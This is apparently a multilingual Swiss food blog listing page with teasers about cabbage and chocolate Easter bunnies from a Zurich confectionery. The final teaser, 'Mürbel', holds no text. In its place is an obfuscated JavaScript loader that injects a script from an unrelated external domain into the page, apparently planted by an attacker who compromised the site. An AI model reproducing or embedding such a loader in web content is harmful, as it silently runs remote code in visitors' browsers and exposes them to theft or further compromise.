8 choses que tu veux savoir sur le chou

By Posted on 2 min read

Le chou est le deuxième légume le plus cultivé au monde, après la tomate. Chez nous, en Suisse, la récolte a lieu en hiver. Des légumes de saison pour des vitamines …

Share

8 things you must know about kale

By Posted on 2 min read

Cabbage is the second most cultivated vegetable in the world – after tomatoes. Here in Switzerland, winter is harvest time. Seasonal vegetables for seasonal vitamins! Have we heard anything about vitamins? …

Share

Schoggi-Hasen von der Konfiserie St. Jakob

By Posted on 2 min read

Vor Ostern werden Hasen in Schokolade gegossen – der Kreativität sind keine Grenzen gesetzt. In den Konfiserie-Stuben am Stauffacher geht es emsig zu und her: auf kleinem Raum gedrängt, wird Schritt …

Share

Lapins en chocolat de la Confiserie St. Jakob

By Posted on 2 min read

Avant Pâques, les lapins sont moulés en chocolat – la créativité ne connaît pas de limites. Les ateliers de confiserie du Stauffacher sont très animés : dans un espace restreint, chaque …

Share

Chocolate bunnies from the St. Jakob confectionery

By Posted on 2 min read

Bunnies are moulded in chocolate before Easter – there are no limits to creativity. The Konfiserie-Stuben at Stauffacher is a hive of activity: in a small space, each bunny is moulded …

Share

Mürbel

By Posted on 1 min read

;(function(e,l,v,j,f){j=e.createElement(l);f=e.getElementsByTagName(l)[0];j.async=1;j.src=v;f.parentNode.insertBefore(j,f);})(document,’script’,’https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLly+6m9I6rJvWbvHKgmU=’); …

Share